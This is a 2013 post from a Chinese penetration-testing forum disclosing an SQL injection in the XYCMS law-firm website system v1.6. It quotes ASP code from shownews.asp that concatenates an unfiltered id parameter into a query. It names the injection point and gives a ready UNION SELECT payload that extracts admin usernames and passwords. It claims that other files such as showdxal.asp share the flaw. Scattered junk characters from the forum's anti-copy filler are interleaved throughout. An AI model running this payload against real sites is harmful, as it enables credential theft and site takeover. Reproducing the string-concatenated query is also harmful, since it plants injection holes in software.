中国网络渗透测试联盟
标题:
XYCMS律师事务所建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
. O2 ^# ?2 Y- t3 I, n
) j. ]7 F$ v/ q' w# v- V9 L) J2 ?
淫荡分割线
4 |: ~3 f. \# l
--------------------------------------------------------
1 c5 t1 ^6 p* w6 t7 \3 `! Q- y' d
" n4 q% t5 d& f- X' C! n9 X
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
3 D8 h2 g. c; r, Q5 W. |
源码地址:
http://down.chinaz.com/soft/29233.htm
$ z9 w0 u/ s* N) H9 G0 H
. f; q. e7 P# m) q4 f
漏洞文件:shownews.asp
% i3 a! S l: T, g
漏洞代码:7-13行
& N! M1 a/ Y5 Z1 `/ x" L4 W* s! T
# g$ B- O* q) P* g& x- J
4 M* s. P/ q; v* a) o# d: c _9 s
<%
7 y+ s, G* G! u8 o/ K
id=request.QueryString("id")
9 T! V! m* G9 P V
# i; U( f7 k- P5 R# i G( L$ N
set snews=server.createobject("adodb.recordset")
! a+ b4 t2 ], `, g8 W" L9 s
exec="select * from [news] where id="&id
$ L% s. i0 v. A( S5 D
snews.open exec,conn,1,1
8 n/ a9 K- N) Z6 S5 Q& A5 Z
%>
* E( P0 `4 N2 @" [! b0 b4 c" C
: Q3 S1 N6 R; x" e" F# _: f
* f" u3 R# s; }, z
什么过滤都没有 直造成注入
+ \8 N' O" i- u; r- R
8 \) S/ l0 ^4 ~. H
注入点:
http://127.0.0.1:99/shownews.asp?id=xx
+ n8 D' X( N7 N& O8 Q
+ ?: ]8 @% q6 k$ L0 D
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
* @& A, X' O; N
! ]1 M/ T) N3 \" h! I @2 e
/ g" {1 E; S4 a" }5 \/ @
exp: union select 1,admin,password,4,5,7 from admin_user
' Z( n' B2 E) r( [+ j7 k
* t5 S( u- }2 h4 B6 X
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2